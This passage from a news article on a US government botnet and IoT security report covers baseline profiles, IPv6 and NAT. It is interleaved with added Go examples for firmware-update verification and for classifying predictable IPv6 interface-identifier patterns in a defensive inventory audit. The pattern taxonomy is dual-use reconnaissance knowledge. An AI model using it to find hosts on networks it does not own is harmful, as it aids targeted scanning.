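	if !ed25519.Verify(pinnedPub, m.encode(), sig) {
		return ErrBadSignature
	}
	if m.Version <= installed {
		return ErrRollback
	}
	if sha256.Sum256(image) != m.Digest {
		return ErrDigestMismatch
	}
	return nil
}

func main() {
	// Constructed keys and image for the demo; a real device has the public key baked in at manufacture.
	pub, priv, err := ed25519.GenerateKey(rand.Reader)
	if err != nil {
		panic(err)
	}
	image := []byte("constructed firmware image, release 2")
	m := Manifest{Version: 2, Digest: sha256.Sum256(image)}
	sig := SignManifest(priv, m)

	fmt.Println("genuine update:    ", VerifyUpdate(pub, 1, m, sig, image))
	fmt.Println("tampered image:    ", VerifyUpdate(pub, 1, m, sig, []byte("not the signed image")))
	fmt.Println("rollback attempt:  ", VerifyUpdate(pub, 2, m, sig, image))
	otherPub, _, _ := ed25519.GenerateKey(rand.Reader)
	fmt.Println("wrong signing key: ", VerifyUpdate(otherPub, 1, m, sig, image))
}
```

The three failure cases in `main` are the ones the report’s phrasing implies but does not spell out: a modified image, a replayed older release, and a manifest signed by someone other than the vendor. A device that only checks a hash, or only checks a signature without a version, passes at least one of them.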

Baseline

The US government is not going to impose rules on industry so instead it argues the case for working with businesses to develop “broadly accepted baseline security profiles for IoT devices in home and industrial applications.” And it suggests using the US government’s role as a big procurement organization to “accelerate this process by adopting baseline security profiles for IoT devices in US government environments” – which sounds like a smart approach and has worked to some degree with things like DNSSEC and IPv6.

Perhaps the most public-facing recommendation, however, is for the government to fund a consumer awareness campaign over IoT security. “The federal government should establish a public awareness campaign to support recognition and adoption of the home IoT device security profile and branding,” it argues.

Later on, it also advocates for more federal dollars to be spent on research and development “to support advancement in DDoS prevention and mitigation, as well as foundational technologies to prevent botnet creation.”

Speaking of IPv6, the report is a little concerned about the potential impact of widespread adoption of the new protocol on cybersecurity.

IPv6 will give every device its own IP address and so, potentially, make many millions of new devices susceptible to being attacked and hacked. In this respect, the use of IPv4 and NATs may produce a more secure environment by putting a range of devices behind a single IP address.

It’s not backing away from IPv6 adoption – in fact it argues for incentives to ensure faster take-up by ISPs – but it does recommend investigating “how wider IPv6 deployment can alter the economics of both attack and defense.”

Natty dread

One plus to IPv6 is that people will be able to more easily discover which specific device has been compromised. But at the same time it references the Mirai botnet as being especially effective because it attacked devices (typically webcams) that had their own IP address. By contrast: “NAT tools act as an incidental firewall, preventing devices in the home from being directly reached by the sort of mass-scanning tools that spread malware and lead to widespread infection.”

It even digs into the issue of a greatly expanded namespace: “In theory, the IPv6 address space is so large that it would not be scannable using existing tools, but experts have observed that patterns would allow new scanning techniques to still discover vulnerable devices.”

So what’s the solution? Studies with a focus on “further innovation at the edge of the network.”
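The “patterns” the report alludes to are the predictable ways interface identifiers (the low 64 bits of an IPv6 address) get assigned: hand-picked low values such as ::1 or ::53, MAC-derived EUI-64 identifiers with 0xfffe in the middle, and IPv4 addresses copied into the low 32 bits (the families catalogued in RFC 7707). The following is an added example, not code from the report or from the Register article: a small inventory audit that labels each address by pattern family so an operator can see how many of its own hosts would be cheap to enumerate and move them to opaque identifiers (RFC 7217 stable-privacy or temporary addresses). The sample inventory uses the 2001:db8::/32 documentation prefix and is constructed for the example; the “random-like” label is a heuristic meaning only that none of the cheap patterns matched.

```go
package main

import (
	"fmt"
	"net/netip"
)

// IIDPattern labels the structure of an IPv6 interface identifier (low 64 bits),
// following the address-pattern families described in RFC 7707.
type IIDPattern string

const (
	PatternEUI64      IIDPattern = "eui64"       // MAC-derived: 0xff 0xfe in the middle of the IID
	PatternLowByte    IIDPattern = "low-byte"    // ::1, ::2, ::53 ...: only the low 16 bits are set
	PatternEmbeddedV4 IIDPattern = "embedded-v4" // an IPv4 address copied into the low 32 bits
	PatternRandomLike IIDPattern = "random-like" // e.g. RFC 7217 stable-privacy or temporary addresses
	PatternInvalid    IIDPattern = "invalid"     // not a native IPv6 address string
)

// ClassifyIID reports which predictable family, if any, the address's IID falls into.
func ClassifyIID(s string) IIDPattern {
	addr, err := netip.ParseAddr(s)
	if err != nil || !addr.Is6() || addr.Is4In6() {
		return PatternInvalid
	}
	raw := addr.As16()
	iid := raw[8:] // bytes 8..15 are the interface identifier

	// EUI-64 (RFC 4291 appendix A): the 48-bit MAC is split and 0xfffe inserted in the middle.
	if iid[3] == 0xff && iid[4] == 0xfe {
		return PatternEUI64
	}

	upper32Zero := true
	for _, b := range iid[:4] {
		if b != 0 {
			upper32Zero = false
			break
		}
	}
	if upper32Zero {
		// Low 32 bits only. A routable IPv4 address never has a zero first octet,
		// so a non-zero byte 4 is taken as an embedded IPv4 address; otherwise the
		// value is small enough to be a hand-assigned "low-byte" identifier.
		if iid[4] != 0 {
			return PatternEmbeddedV4
		}
		return PatternLowByte
	}
	return PatternRandomLike
}

// AuditInventory counts pattern families and returns how many addresses fall into a
// predictable family (everything except random-like and invalid entries).
func AuditInventory(addrs []string) (counts map[IIDPattern]int, predictable int) {
	counts = make(map[IIDPattern]int)
	for _, a := range addrs {
		p := ClassifyIID(a)
		counts[p]++
		if p != PatternRandomLike && p != PatternInvalid {
			predictable++
		}
	}
	return counts, predictable
}

func main() {
	// Constructed sample inventory in the documentation prefix; none of these are real hosts.
	inventory := []string{
		"2001:db8:0:10::1",                  // gateway-style low-byte
		"2001:db8:0:10::53",                 // service-port-style low-byte
		"2001:db8:0:10:20c:29ff:fe6f:1a2b",  // EUI-64 derived from a MAC address
		"2001:db8:0:10::192.0.2.7",          // IPv4 address embedded in the IID
		"2001:db8:0:10:3c1e:9a4f:7b2d:e0f1", // random-like, as RFC 7217 would produce
	}
	for _, a := range inventory {
		fmt.Printf("%-36s %s\n", a, ClassifyIID(a))
	}
	counts, predictable := AuditInventory(inventory)
	fmt.Printf("%d of %d addresses use a predictable IID pattern: %v\n",
		predictable, len(inventory), counts)
}
```

Run over a real address inventory, the count of predictable identifiers is the number of hosts that the report’s “new scanning techniques” would find without touching the rest of the 2^64 space; the fix on the host side is to enable RFC 7217 or temporary addresses rather than EUI-64, and on the network side to stop hand-assigning ::1-style identifiers to anything that is not meant to be found.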

There are lots of other ideas, suggestions and recommendations – most of them containing the word “should”, which somewhat undercuts any sense of urgency – but one that stands out is ensuring that the next generation of engineers is trained in what will undoubtedly be a critical skill from this point on.

“The academic sector, in collaboration with the National Initiative for Cybersecurity Education, should establish cybersecurity as a fundamental requirement across all engineering disciplines.”

That’s just one of many good ideas contained in this report, which was published late last week. It is open for public comment from now until February 12 – so a little over a month (email: [email protected]). If you have strong feelings about any of this, now would be a good time to let the US government know. ®


Article source: http://go.theregister.com/feed/www.theregister.co.uk/2018/01/09/us_govt_cybersecurity_recommendations/